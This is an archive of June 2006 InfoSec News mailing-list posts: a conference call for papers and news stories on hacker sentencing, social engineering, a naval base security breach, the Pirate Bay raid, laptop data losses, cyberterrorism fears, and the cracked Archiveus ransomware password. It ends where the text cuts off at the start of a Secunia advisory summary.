From isn at c4i.org  Thu Jun  1 01:47:27 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:27 -0500 (CDT)
Subject: [ISN] ACSAC 22 (Miami Beach, FL) - June 10 - extended deadline
Message-ID: <Pine.LNX.4.44.0606010047170.19618-100000@idle.curiosity.org>

Forwareded from: ACSAC Distribution Manager <distribution at acsac.org>

Dear colleague.

We are extending the submission deadlines for the technical track,
panels, tutorials, workshop till June 10, 2006.

Apologies if you receive multiple copies of this announcement.

PDF versions at
                 http://www.acsac.org/2006/cfp_2006.pdf
               http://www.acsac.org/2006/cfp_2006-a4.pdf

                       ---------------------------
                         Call For Participation
                       ---------------------------

                     Submission deadline approaching!

          22nd Annual Computer Security Applications Conference
                          December 11-15, 2006
                          Miami Beach, Florida

                          http://www.acsac.org

                        Submission      Acceptance
                         Deadline      Notification
    Technical Track    June 10, 2006   Aug. 13, 2006
    Panels             June 10, 2006   Aug. 13, 2006
    Tutorials          June 10, 2006   Jul. 20, 2006
    Workshop           June 10, 2006   Jul. 20, 2006
    Case Studies       July 1,  2006   Aug. 15, 2006
    Works in Progress  Sep. 8,  2006   Oct.  1, 2006

See http://www.acsac.org/cfp for detailed submission information!
Please submit blinded papers, at most 10 pages in length at 10pt.

---------------------------------------------------------------------------

      ACSAC is presented by a group of professionals who are
      working to facilitate information sharing among
      colleagues. We're an all-volunteer not-for-profit
      organization.  Our postal address is 2906 Covington Road,
      Silver Spring, MD  20910-1206.
      You can help ACSAC reach people who might benefit from this
      information. Feel free to forward this message with a
      personal note to your friends and colleagues. They can sign
      up at http://www.acsac.org/list.
      We have moved to a new web host and are trying to remove
      duplicates from our mailing lists. If you receive duplicate
      messages, or simple want to be removed from our list, please
      reply with the word REMOVE in the subject.





From isn at c4i.org  Thu Jun  1 01:47:38 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:38 -0500 (CDT)
Subject: [ISN] Computer hacker to appeal sentence
Message-ID: <Pine.LNX.4.44.0606010047280.19618-100000@idle.curiosity.org>

http://tvnz.co.nz/view/page/411749/735744

Jun 1, 2006 

A computer hacker is to appeal against his prison sentence for
internet fraud, saying it is too severe.

Aucklander Mark Hayes, 19, was sentenced last Friday in the District
Court in Auckland to two years six months in prison after pleading
guilty to more than 100 computer-related offenses and around $38,000
worth of fraud.

In sentencing, the Judge called Hayes a "serious recidivist computer
criminal" for his offending in 2004 and reoffending while on bail in
2005.

Hayes' lawyer Peter Kaye says his client feels his sentence is too
high for a person of his age and circumstances. Hayes is not eligible
to apply for home detention.

The Crown Solicitor for Auckland last week described the sentence as
"substantial."

Crown Solicitor Simon Moore said such offending would normally draw a
jail term of three months at the most but the judge wanted to send a
clear message about the seriousness of hacking.

The court heard that in 2004, Hayes used a "keystroke logger" hacking
device to access the login password details of TradeMe account
holders.

He used their accounts to buy $18,500 worth of computer and clothing
goods, paying for them with other peoples' money whose bank account
details he had also hacked into.

Hayes pleaded guilty.

He then appeared before the court again for similar offending in 2005,
again using a "keystroke logger" to get bank account details. He took
around $20,000.

In sentencing, Judge David Harvey called Hayes a "serious recidivist
computer criminal", ordering a jail sentence of 30 months and the
repayment of around $18,000.




From isn at c4i.org  Thu Jun  1 01:47:15 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:15 -0500 (CDT)
Subject: [ISN] Security a bridge too far
Message-ID: <Pine.LNX.4.44.0606010047050.19618-100000@idle.curiosity.org>

http://www.thesun.co.uk/article/0,,2-2006250101,00.html

By ALEX PEAKE
May 31, 2006

THE Sun yesterday exposed security at Britain's biggest naval base as
a shambles after strolling unchallenged on to the bridge of a WARSHIP.

Our reporter walked through two checkpoints at Plymouth's HM Devonport
- brandishing a worker's lost photo ID - before spending an hour on
board the Navy's 21,578-ton flagship HMS Ocean.

Posing as a cleaner, he strolled around the deck of the giant vessel -
even pausing to flick through its log books and sip tea in the galley.

Furious Royal Navy chiefs launched TWO probes last night as it emerged
most of the ship's 500-strong company were on board.

The base is surrounded by a 9ft perimeter fence and guarded by
security staff and scores of military police officers with alsatians.

But yesterday, armed with just workmen's overalls and the lost pass -
handed to us by a concerned reader - our man gained entry after
flashing the ID card over 20 yards from guards.

They waved him through and even wished him "good morning". Yet had we
been terrorists, we could have caused carnage.

Within minutes our man found the quay where HMS Ocean, the Navy's
largest ship, is moored for maintenance.

As ship workers and sailors filed up the gangplank, we followed them
on to the warship, designed to hold 18 attack helicopters and an army
of highly-trained commandos.

Two machine gun-carrying marines were checking passes. But again our
man held his finger over the real workman's picture and marched in.

Once at the heart of the ship - which is on 24 hours' notice to sail
anywhere in the world if a crisis breaks - he was directed by one
unwitting worker to the bridge and nerve centre.

He toured the area with video gear for 15 minutes before moving to a
walkway, where photographer Marc Giddings snapped him from a road.

Our reporter also saw the engine room, living quarters and anchor
room. Only one sailor asked what he was doing, but he returned to
hoisting a flag when told our man was a cleaner.

We finally left the ship, praised for leading the Marines' 2003
invasion of southern Iraq, and left the base as easily as we walked
in.

A Navy spokesman said: "We take all breaches of security very
seriously. A full investigation by the ship and the naval base has
commenced."




From isn at c4i.org  Thu Jun  1 01:47:51 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:51 -0500 (CDT)
Subject: [ISN] Employees may be opening doors to criminals
Message-ID: <Pine.LNX.4.44.0606010047390.19618-100000@idle.curiosity.org>

http://news.ft.com/cms/s/458807fe-efec-11da-b80e-0000779e2340,dwp_uuid=863bb51c-1f76-11da-853a-00000e2511c8.html

By Kate Mackenzie 
May 30 2006 

Holding a security door open for someone laden with cups of coffee or
a big stack of documents may seem the polite thing to do. But you may
have fallen for a classic trick deployed by hackers.

The person might have been smartly dressed and looked legitimate, but
that is a key part of the deception of "social engineering", which
uses simple, everyday situations to deceive individuals into giving
out physicial or technical access to facilities that can be a mine of
valuable information.

Whether getting into a building, eliciting a password over the
telephone or persuading a phishing victim to e-mail their banking
details, "social engineering" is responsible for more than half of
security breaches, and some estimates claim the proportion is as high
as 90 per cent.

Deploying a powerful firewall or maintaining up-to-date software
patches on thousands of desktop machines is easy compared with raising
employees' awareness of their own risky behaviour.

Last year, for example, three call centre staff at Mphasis, an Indian
outsourcer, tricked several Citibank customers into revealing their
Pin numbers and then stole hundreds of thousands of dollars, in an
incident that rocked the outsourcing industry.

Bob Blakley, chief scientist for security and privacy at IBM's Tivoli
division, says it is partly because there is no "standard set of
social behaviours" for tasks such as resetting a password over the
phone, so many people are easily persuaded to go along with risky
procedures.

The problem is worsening, as hacking attempts and malware are
increasingly used by organised criminals, rather than fame-hungry or
curious geeks.

Despite a consensus that it is always people who are the weakest point
in any security system, workplace prevention tactics are often
neglected or relegated to a set of acceptable use policies that are
largely ignored by staff.

By contrast, meticulous and detailed documents on the dishonest use of
"social engineering" techniques are easily available on the internet.

One such document details a vast number of techniques, ranging from
"dumpster diving" to shoulder surfing - looking over someone's
shoulder as they key in a password or Pin - to "conformity": for
example, telling the target that everyone else has given out their
password over the phone.

Appealing to people's better nature by phoning up and pretending to be
an out-of-town colleague who urgently needs to access the network is
another.

In spite of all the experimentation and refinement of techniques to
persuade and confuse potential "social engineering" targets, the
security industry's response is almost exclusively focused on
technology rather than psychology.

What can be done about it? The first thing is to take a wider view of
security, says Jan Babiak, Head of Information Security at Ernst &
Young.

"For example in certain countries, you have a very good chance of
kidnapping senior executives. The physical security [team] take
enormous precautions, but the IT people might have left something like
a calender somewhere where it's easy to hack into."

Cisco, meanwhile, urges executives to create a "top-down" culture of
security awareness instead of palming off all security to a separate
team.

Dave Shackleford, the director of security solutions and assessment
services at Vigilar, a US security consultancy, says that executives
are often the softest target for "social engineering" experiments.  
They tend to think they are "above the law" and have access to high
level information. They are also used to associating with other
top-level people, says Shackleford, so their trust levels are higher.

Mr Shackleford frequently puts clients' security defences to the test
by, for example, photographing staff IDs with a telephoto lens to copy
them. No attempted physical test undertaken by Vigilar has failed, he
says.

Mr Shackleford says companies need policies in place: "If they don't
have explicit policies laid out for their employees, then they may not
know any better."

Vigilar's clients act on the information gleaned from the tests in
different ways, but punishing employees who fell for a "social
engineering" trick is not usually one of them.

"It's human nature to be helpful," says Mr Shackleford. Instead, they
tend to respond by improving training and awareness procedures.

Some of Mr Shackleford's techniques are frighteningly simple: "Just
phoning someone's extension can reveal if they are out of town, for
example, and for how long."

Robert Chapman, chief executive of The Training Camp, which runs
security awareness courses for non-IT staff, says: "All the talk and
all the money really is on technology. People in a sense brag about
how much they spent on their Cisco firewalls." But they overlook the
obvious weaknesses.

His company recently ran the well-publicised "CD test" in London in
which 100 CDs were handed out to workers in the City, promising a free
Valentine's Day gift if they installed it. Once installed the CD
reported back to Chapman; he says the majority of recipients did so.

Bruce Schneier, the cryptographer who also works as a security
consultant, is not so sure.

He believes technical security must take into account behaviours, but
does not believe "social engineering" can be adequately guarded
against by training: "Have you ever met a user?" he replies when asked
about efforts to improve staff awareness.

Technology, Mr Schneier says, must be more tailored to each user's
needs and risk levels. Does a typical office worker, for example, need
to have access to a USB port or even a CD drive?

"This is not just a 'get some guys on and solve it' problem," says
Schneier. "It's like murder, burglary - all of these things, they've
been around for ever."




From isn at c4i.org  Thu Jun  1 01:48:50 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:48:50 -0500 (CDT)
Subject: [ISN] Police close file sharing site
Message-ID: <Pine.LNX.4.44.0606010048391.19618-100000@idle.curiosity.org>

http://www.thelocal.se/article.php?ID=3955&date=20060531

By James Savage
31st May 2006 

Police have closed down The Pirate Bay, a Sweden-based file sharing
site and one of the most popular websites of its kind in the world.

Three people were taken in for questioning after police raids in
Sweden on Wednesday. The trio, ages 22, 24 and 28, are suspected of
violating property rights legislation, police spokesman Ulf G?ranzon
said.

Servers connected to the site have been impounded and the site was
down on Wednesday afternoon, although the operators of The Pirate Bay
have set up a temporary website to provide updates on the situation.

Some fifty policemen and women were involved in raids on ten homes and
offices in Sweden.

The three men taken in by police were still being questioned on
Wednesday afternoon. They all have links to The Pirate Bay.  
Prosecutors will decide whether to detain the men after they have been
questioned.

"The suspects are not people who download files, but are people who
have relations to the website," Ulf G?ranzon told The Local.

He would not reveal anything more about the roles that the men played.

Police have been monitoring the website and the men behind it for some
time. Computers were taken during raids on the men's homes and offices
to secure evidence.

"We are now going to look at how the operation is structured,"  
G?ranzon said.

"At the moment we are talking to lots of people about this case. We
are still at a very early stage in our investigations," he said.

He would not reveal whether police had their eyes on further suspects.

Henrik Pont?n, lawyer at Antipiratbyr?n (The Anti-Pirate Bureau) in
Stockholm, welcomed the move to close down the site.

"It is good that the Swedish police are now prioritising this kind of
crime. The copyright laws finance creativity within film, computer
gaming, music and other culture," said Pont?n.

"People who break copyright laws steal from the creators and
movie-watching public of the future. The closure of The Pirate Bay is
therefore good for all of us who enjoy new film and entertainment."

But Tobias Andersson at pressure group Piratbyr?n (The Pirate Bureau),
which founded The Pirate Bay, stressed that there was no
copyright-protected material on the servers.

"The Anti-Pirate Bureau has clearly misled the police in this case,"  
said Andersson.

"They appear to have persuaded police who are incompetent in IT that
the servers in question are full of copyright-protected material. This
is a gross misuse of taxpayers' money."

Andersson also condemned the fact that police had closed down a number
of other websites, including The Pirate Bureau, which he says is no
longer officially linked to the Pirate Bay.

"This is the greatest infringement. The Anti-Pirate Bureau has clearly
fooled the police into closing down its antagonists, The Pirate
Bureau."

"We are very upset that the film industry doesn't dare to have a
debate, and chooses instead to trick politicians and the police into
criminalizing their opponents and a large portion of the Swedish
population."

The Pirate Bay is a BitTorrent tracker, which enables people to
download large files such as movies from other users.




From isn at c4i.org  Fri Jun  2 01:16:58 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:58 -0500 (CDT)
Subject: [ISN] Ernst & Young laptop loss exposes 243,
	000 Hotels.com customers
Message-ID: <Pine.LNX.4.44.0606020016480.32439-100000@idle.curiosity.org>

http://www.theregister.co.uk/2006/06/01/ey_hotels_laptop/

By Ashlee Vance in Mountain View
1st June 2006

Exclusive - Ernst & Young's laptop loss unit continues to be one of
the company's more productive divisions. We learn this week that the
accounting firm lost a system containing data on 243,000 Hotels.com
customers. Hotels.com joins the likes of Sun Microsystems, IBM, Cisco,
BP and Nokia, which have all had their employees' data exposed by
Ernst & Young, as revealed here in a series of exclusive stories.

The Register can again exclusively confirm the loss of the Hotels.com
customer information after having received a copy of a letter mailed
out jointly by the web site and Ernst & Young. A Hotels.com spokesman
also confirmed the data breach, saying Ernst & Young notified the
company of the laptop loss on May 3. The laptop in question was stolen
from an Ernst & Young worker's car in Texas and did have some basic
data protection mechanisms such as, erm, the need for a password.

"Recently, Hotels.com was informed by its outside auditor, Ernst &
Young, that one of Ernst & Young's employees had his laptop computer
stolen," Hotels.com told its customers in the letter. "Unfortunately,
the computer contained certain information about customer transactions
with Hotels.com, and other sites through which we provide booking
services directly to customers, from 2002 through 2004.

"This information may have included your name, address and some credit
or debit card information you provided at that time."

Ernst & Young in February lost one laptop that held information on
what's believed to be tens of thousands of Sun, IBM, Cisco, BP and
Nokia employees. It's not clear if this was the same system in the
Hotels.com incident. Ernst & Young has not returned our calls seeking
comment and has been reluctant to provide information on these
incidents in the past.

Ernst & Young in February also lost four laptops in Miami when its
workers decided to leave their systems in a hotel conference room
while they went out for lunch.

Major media outlets have so far ignored the Ernst & Young laptop
incidents, although they were quick to follow on our confirmation of a
Fidelity data breach that saw 200,000 HP workers have their
information exposed.

Ernst & Young offers a variety of security services to customers, and
encourages clients to be transparent with their policies around
customer data issues. The company, however, has not exactly been
proactive with regard to its own issues. ?




From isn at c4i.org  Fri Jun  2 01:17:10 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:17:10 -0500 (CDT)
Subject: [ISN] Cern seeks to tighten security for data grid
Message-ID: <Pine.LNX.4.44.0606020017000.32439-100000@idle.curiosity.org>

http://www.vnunet.com/computing/news/2157258/cern-seeks-tighten-security

Lara Williams
Computing 
01 Jun 2006

Cern, the world's largest particle physics laboratory and birthplace
of the web, is starting a two-year project to improve security for its
worldwide data grid.

The European organisation for nuclear research identified that partner
sites on the grid are a security concern; many are open access public
institutions supporting the lab's projects.

Cern tests innovative technologies in partnership with industry, and
has asked security specialists Stonesoft and F-Secure to test security
for the launch of the large hadron collider (LHC) project next year.

The 27km underground particle accelerator will distribute large
amounts of information onto the worldwide LHC computing grid. More
than 1GB per second of data will be generated and either stored at
Cern or sent to 12 major computing sites and a further 100 institutes
around the world for analysis.

"The results of the security trials may provide solutions which could
eventually be commercially available to other organisations," said
Cern spokesman Francois Grey.

Although large data grids are only starting to be used in business,
Cern is seeing a lot of interest from industry. The lab is developing
grids that will reach across organisational boundaries, allowing
multiple institutions to share resources.

"Businesses are now becoming interested in this kind of grid," said
Grey. "Its use could enable suppliers and companies to share resources
and large corporations to share information between business units.  
Grid technology will only be adopted if the right type of security
solutions are available."

Particle collisions in the LHC will create 15 petabytes per year of
data, and it is due to run for a decade. The grid will have a storage
and analysis infrastructure accessed by more than 7,000 scientists
worldwide.

The aim of the LHC is to simulate the events taking place one
millionth of a millionth of a second after the universe was created -
information that could revolutionise our understanding of how the
natural world works.




From isn at c4i.org  Fri Jun  2 01:16:29 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:29 -0500 (CDT)
Subject: [ISN] VA Data in Format Not Widely Used
Message-ID: <Pine.LNX.4.44.0606020016180.32439-100000@idle.curiosity.org>

http://www.washingtonpost.com/wp-dyn/content/article/2006/05/31/AR2006053102000.html

By Christopher Lee
Washington Post Staff Writer
June 1, 2006

The sensitive personal information of 26.5 million veterans that was
stolen from a Department of Veterans Affairs data analyst last month
was stored in a format that could make it difficult for thieves to
use, according to an internal VA memo.

In the May 5 memo, VA privacy officer Mark Whitney wrote that the
critical data "may not be easily accessible" because most of it --
including names, birth dates and Social Security numbers -- was stored
in a specialized, standard format used for data manipulation and
statistical analysis.

The format "requires specialized application software and training" to
write computer code "to access and manipulate the data for use,"  
Whitney wrote in the memo, obtained yesterday by The Washington Post.

Ari Schwartz, deputy director of the nonprofit Center for Democracy
and Technology, a privacy group, said Whitney is generally right that
the information would be hard to extract.

It would be easier, however, if the laptop stolen along with an
external hard drive and several data disks has the software needed to
view the data, he said. "This is not nearly the type of protection
they would have had if they had followed basic security procedures and
encrypted this," Schwartz said.

The Whitney memo, dated two days after the burglary at the analyst's
Aspen Hill home and distributed to several high-ranking VA officials,
provides the first public indication that some addresses and telephone
numbers were among the stolen data; it refers to such information
being part of electronic files of a national survey of about 20,000
veterans in 2001.

Also stolen was an electronic spreadsheet with 6,744 records about
"mustard gas veterans" -- generally, veterans who took part in
chemical warfare tests during World War II. Another stolen file
contains as many as 10 diagnostic codes from the treatment file of one
veteran who visited the VA health-care system on 57 dates.

"These type of data contain more than limited financial information,
the codes contain information about veterans' medical conditions,"  
Rep. Bob Filner (D-Calif.) said in a statement. "It is not appropriate
for this information to ever enter the public domain."

Matthew Burns, a VA spokesman, said the department has been "focused
on getting notification to veterans that some of the most sensitive
data was out there."

Also yesterday, VA Secretary Jim Nicholson announced that he had named
Richard M. Romley, a former prosecutor from Maricopa County, Ariz., as
his new special adviser for information security. Romley, a Marine
Corps veteran, will evaluate the department's computer security
procedures and recommend improvements.

The move follows the resignation last week of Michael H. McLendon, a
VA deputy assistant secretary who learned of the May 3 burglary within
hours of the crime but did not immediately tell top-ranked officials.

Nicholson announced Tuesday that the employee will be fired and that
Dennis M. Duffy, who has been acting assistant secretary for policy
and planning, had been placed on administrative leave. The employee
worked in McLendon's office, and Duffy was in charge of the division
in which both worked.

Nicholson learned of the information breach on May 16 and told the
public on May 22, nearly three weeks after the crime.

? 2006 The Washington Post Company




From isn at c4i.org  Fri Jun  2 01:16:46 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:46 -0500 (CDT)
Subject: [ISN] The new breed of cyber-terrorist
Message-ID: <Pine.LNX.4.44.0606020016320.32439-100000@idle.curiosity.org>

http://news.independent.co.uk/world/science_technology/article622421.ece

By Jimmy Lee Shreeve 
31 May 2006

According to cyber-security experts, the terror attacks of 11
September and 7 July could be seen as mere staging posts compared to
the havoc and devastation that might be unleashed if terrorists turn
their focus from the physical to the digital world.

Scott Borg, the director and chief economist of the US Cyber
Consequences Unit (CCU), a Department of Homeland Security advisory
group, believes that attacks on computer networks are poised to
escalate to full-scale disasters that could bring down companies and
kill people. He warns that intelligence "chatter" increasingly points
to possible criminal or terrorist plans to destroy physical
infrastructure, such as power grids. Al-Qa'ida, he stresses, is
becoming capable of carrying out such attacks.

Most companies and organisations seem oblivious to the threat.  
Usually, they worry about e-mail viruses and low-grade hacker attacks.  
But Borg sees these as the least of their worries. "Up to now,
executives and network professionals have worried about what
adolescents and petty criminals have been doing," he says. "In most
cases, these kinds of cyber attacks aren't very destructive. The
reason is that businesses generally have enough inventory and extra
capacity to make up for any short-term interruptions."

What companies and organisations should worry about, Borg insists, is
"what grown-ups could do" - terrorists or hardcore criminals. One key
target would probably be the vital Supervisory Control and Data
Acquisition (Scada) systems in power plants and similar industries.  
"Chatter on Scada attacks is increasing," says Borg, referring to
patterns of behaviour that suggest that criminal gangs and militant
groups are now fully capable of unleashing such attacks.

"Control systems are a particular worry, because these are the
computer systems that manage physical processes. They open and shut
the valves, adjust the temperatures, throw the switches, regulate the
pressures," he says. "Think of the control systems for chemical
plants, railway lines, or manufacturing facilities. Shutting these
systems down is a nuisance. Causing them to do the wrong thing at the
wrong time is much worse."

Until now, hackers have usually targeted credit cards or personal
information on the web. More sophisticated hackers, however, are
beginning to focus on databases. The type of data most likely to be
hit, Borg says, might include a pharmaceutical company's drug
development databases, or programs that manipulate data, such as
formulas for generating financial statements.

"Many attacks of this kind would have two components. One would alter
the process control system to produce a defective product. The other
would alter the quality control system so that the defect wouldn't
easily be detected," Borg says. "Imagine, say, a life-saving drug
being produced and distributed with the wrong level of active
ingredients. This could gradually result in large numbers of deaths or
disabilities. Yet it might take months before someone figured out what
was going on." The result, he says, would be panic, people afraid to
visit hospitals and health services facing huge lawsuits.

Deadly scenarios could occur in industry, too. Online outlaws might
change key specifications at a car factory, Borg says, causing a car
to "burst into flames after it had been driven for a certain number of
weeks". Apart from people being injured or killed, the car maker would
collapse. "People would stop buying cars." A few such attacks, run
simultaneously, would send economies crashing. Populations would be in
turmoil. At the click of a mouse, the terrorists would have won.

Is Borg justified in his fears? All this sounds like a plot from a
thriller; it's hard to take it seriously. But intelligence reports in
the last year or so make for worrying reading. An assessment by the
British security service MI5 stated that "Britain is four meals away
from anarchy". And officials admit their greatest fears about
electronic attacks focus on the more exposed networks that make up the
"critical national infrastructure" - the systems Borg is concerned
about.

US agencies are concerned that terrorists could combine electronic and
physical attacks to devastating effect, such as disrupting emergency
services at the same time as mounting a bomb attack.

Risk management analysts, equally edgy, are focusing on the financial
impact on businesses and economies. They believe that an online attack
would undermine public confidence in vital industries, especially
utilities. Nick Robson, a partner at JLT Risk Solutions, says: "A
cyber attack on, say, the power industry would cause communications
operations to close down for a period of time, expose customers to
loss of service, increase liability exposure and ultimately damage
reputation for service delivery."

It isn't just Western nations that fear a digital meltdown. This
month, the Malaysian government announced plans to establish a centre
to fight cyber-terrorism, which will provide an emergency response to
hi-tech attacks around the globe. Prime Minister Abdullah Ahmad Badawi
said the facility - to be located at the technology hub of Cyberjaya
outside Kuala Lumpur - would be called the International Multilateral
Partnership against Cyber-Terrorism, or Impact, and would be funded by
a combination of government revenue and the private sector.

Badawi said the threat of cyber-terrorism was too serious for
governments to ignore. "The potential to wreak havoc and cause
disruption to people, governments and global systems has increased as
the world becomes more globalised," he said. "The economic loss caused
by a cyber attack can be truly severe; for example, a nationwide
blackout, collapse of trading systems or the crippling of a central
bank's cheque clearing system."

While the case for cyber attack appears persuasive, some believe that
much of it is hype. "It's difficult to avoid comparisons with the
Millennium bug and the predictions of widespread computer chaos
arising from the change of date to the year 2000," says Tom Standage,
technology editor at The Economist magazine. "Then, as now, the alarm
was sounded by technology vendors and consultants, who stood to gain
from scaremongering."

Almost ?400m was spent by the Government alone on preparations for the
Millennium bug. Computer consultants issued dire warnings of the
danger of an information technology breakdown that could paralyse
nations on New Year's Day 2000. When the clock struck midnight,
however, few problems were reported. There is scepticism that the bug
was ever a threat. As far as Standage is concerned, those in the
cyber-security industry - be they vendors boosting sales, academics
chasing grants or politicians looking for bigger budgets - always have
a "built-in incentive to overstate the risks".

But what of the Scada systems; surely they are highly vulnerable? "It
is true that utility companies and other operators of critical
infrastructure are increasingly connected to the internet," Standage
concedes. "But just because customers pay their bills online, it
doesn't follow that critical control systems are vulnerable to attack.  
Control systems are usually kept entirely separate from other systems,
for good reason. They tend to be obscure, old-fashioned systems that
are incompatible with internet technology anyhow. Even authorised
users require specialist knowledge."

A simulation in 2002 by the US Naval War College concluded that an
"electronic Pearl Harbor" attack on America's infrastructure would
certainly cause serious disruption. But to pull it off would require
five years of preparation and a $200m budget. As US computer security
guru Bruce Schneier says: "If they want to attack, they will do it
with bombs like they always have."

But Richard Clarke, a former cyber-security expert in the Bush
administration, says this is complacent. "People claim no one will
ever die in a cyber-attack, but they're wrong. This is a serious
threat."

Clarke says that each time the US government has tested the security
of the electric power industry, he and his colleagues have been able
to hack their way in, "sometimes through an obscure route like the
billing system". He reveals that computer security officers at a
number of chemical plants have told him privately that they are very
concerned about the openness of their networks.

Scott Borg of the Cyber Consequences Unit goes along with this. He
believes the $93m budget for 2007 allocated to the Department of
Homeland Security to defend against cyber attack is justified. "Even
systems isolated from the internet are often accessible to thousands
of employees. How secure can any system be if thousands of people and
thousands of data ports can provide inside access to that system?"


The threat from software

IT security consulting firm Cyber Defense Agency (CDA) has warned the
US military, government and "critical infrastructure agencies" against
using outsourced commercial software which could be tampered with by
terrorists. CDA said that gas, electricity, telecommunications,
banking and water companies are among the services that could fall
foul of cyber terrorists exploiting "life-cycle" weaknesses buried
deep in the software code. Life-cycle attacks occur when one line of
code is programmed to open vulnerabilities within the software,
exposing the software and the company to external threats. "Outsourced
commercial software poses a silent but significant security risk to
the defence and welfare of the US," says Sami Saydjari, president of
CDA. "The chances of strategic damage from a cyber-terrorist attack on
the US increases the longer it takes to remedy the risks posed by
outsourced software."




From isn at c4i.org  Fri Jun  2 01:17:21 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:17:21 -0500 (CDT)
Subject: [ISN] Extortion virus code gets cracked
Message-ID: <Pine.LNX.4.44.0606020017120.32439-100000@idle.curiosity.org>

http://news.bbc.co.uk/1/hi/technology/5038330.stm

1 June 2006

Do not panic if your data is hidden by virus writers demanding a
ransom.

Poor programming has allowed anti-virus companies to discover the
password to retrieve the hijacked data inside a virus that has claimed
at least one UK victim.

The Archiveus virus caught out British nurse Helen Barrow and swapped
her data with a password-protected file.

The virus is the latest example of so-called "ransomware" that tries
to extort cash from victims.


Code breaker

Analysis of Archiveus has revealed that the password to unlock the
file containing all the hijacked files is contained within the code of
the virus itself.

This virus swaps files found in the "My Documents" folder on Windows
with a single file protected by a 30-digit password. Victims are only
told the password if they buy drugs from one of three online
pharmacies.

The 30-digit password locking the files is
"mf2lro8sw03ufvnsq034jfowr18f3cszc20vmw". Using the password should
restore all the hijacked files.

"Now the password has been uncovered, there should be no reason for
anyone hit by this ransomware attack to have to make any payments to
the criminals behind it," said Graham Cluley, senior technology
consultant for security firm Sophos.

Archiveus was discovered on 6 May but it took the rest of the month
for the first victim, Rochdale nurse Helen Barrow, to emerge.

Ms Barrow is thought to have fallen victim when she responded to an
on-screen message warning her that her computer had contracted another
unnamed virus. The virus asks those it infects to buy drugs on one of
three websites to get their files back.

"When I realised what had happened, I just felt sick to the core,"  
said Ms Barrow about the incident.

The Archiveus virus is only the latest in a series of malicious
programs used by extortionists to extract cash from victims. Archiveus
seems to use some parts of another ransoming virus called Cryzip that
was circulating in March 2006.




From isn at c4i.org  Fri Jun  2 01:17:32 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:17:32 -0500 (CDT)
Subject: [ISN] Miami U. reports 2nd security breach
Message-ID: <Pine.LNX.4.44.0606020017230.32439-100000@idle.curiosity.org>

http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/1149150686240780.xml&coll=2

June 01, 2006
Associated Press 

An employee at a Miami University branch campus lost a hand-held
personal computer containing private information on 851 students, but
school officials said they don't believe that the data has been used
unlawfully.

The recent case involves a potential breach of privacy that the school
takes very seriously, said Kelly Cowan, interim dean at the Middletown
campus.

Students affected were enrolled between July 2001 and May 2006,
representing about 8 percent of the students on campus during that
five-year period.

It's the second security breach at Miami since last September, when
officials said a report containing some private information on
students was accidentally placed in a file accessible through the
Internet.

It included names, Social Security numbers and information on the
21,762 students enrolled on all Miami campuses in the fall of 2002.

Cowan said the school is tightening its security and increasing
employee training.




From isn at c4i.org  Fri Jun  2 01:17:45 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:17:45 -0500 (CDT)
Subject: [ISN] Toronto firm at centre of security breach
Message-ID: <Pine.LNX.4.44.0606020017350.32439-100000@idle.curiosity.org>

http://www.thestar.com/NASApp/cs/ContentServer?pagename=thestar/Layout/Article_Type1&c=Article&pubid=968163964505&cid=1149113029270&col=968705899037&call_page=TS_News&call_pageid=968332188492

By TYLER HAMILTON
BUSINESS REPORTER
Jun. 1, 2006

Toronto software provider Hummingbird Ltd. has found itself at the
centre of an embarrassing privacy accident involving the social
security numbers of 1.3 million American students.

Hummingbird disclosed yesterday evening that one of its employees lost
a piece of computer equipment that contained the names and social
security numbers of customers who borrowed funds from Round Rock,
Tex.-based Texas Guaranteed, a non-profit company that administers a
U.S. family education loan program.

"The privacy of customer data is of utmost importance to us and we
take our responsibility to safeguard it very seriously. We deeply
regret that this incident has occurred," Barry Litwin, Hummingbird?s
president and chief executive, said in a statement.

"We continue to investigate the facts surrounding this loss of
information and are taking all necessary action in order to ensure
that such occurrences do not happen in the future."

Hummingbird, which announced on May 26 that it is being acquired by
Palo Alto, Calif.-based holding company Symphony Technology Group for
$465 million (U.S.), said it has no reason to believe the equipment
was stolen to obtain confidential data.

The company said the equipment was password-protected and that it was
"extremely unlikely" the data would be misused. Hummingbird was given
the data as part of a contract to develop a custom document management
system for Texas Guaranteed.

According to information on Texas Guaranteed?s Web site, the equipment
was lost on May 24 but Hummingbird didn?t notify the company until
mid-afternoon on May 26, the day Hummingbird disclosed its deal with
Symphony.

The U.S. loan provider said that customers whose information was lost
will be notified over the coming weeks and given advice on how to
guard against identity theft.

"Even though this information is not easily accessed and used, and
even though the loss appears to be inadvertent, we are issuing this
release out of an abundance of caution, because the piece of equipment
has not been located," said Sue McMillin, president and CEO of Texas
Guaranteed, in a statement.

The use of social security numbers as a form of identification in the
United States has been a topic of considerable controversy in recent
weeks. In early May, computer disks containing the social security
numbers of 26.5 million U.S. veterans were stolen from the U.S.  
Department of Veteran Affairs, putting millions of Americans at risk
of identity fraud.




From isn at c4i.org  Fri Jun  2 01:18:07 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:18:07 -0500 (CDT)
Subject: [ISN] Secunia Weekly Summary - Issue: 2006-22
Message-ID: <Pine.LNX.4.44.0606020017470.32439-100000@idle.curiosity.org>

========================================================================

                  The Secunia Weekly Advisory Summary                  
                        2006-05-25 - 2006-06-01                        

                       This week: 102 advisories                       

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best
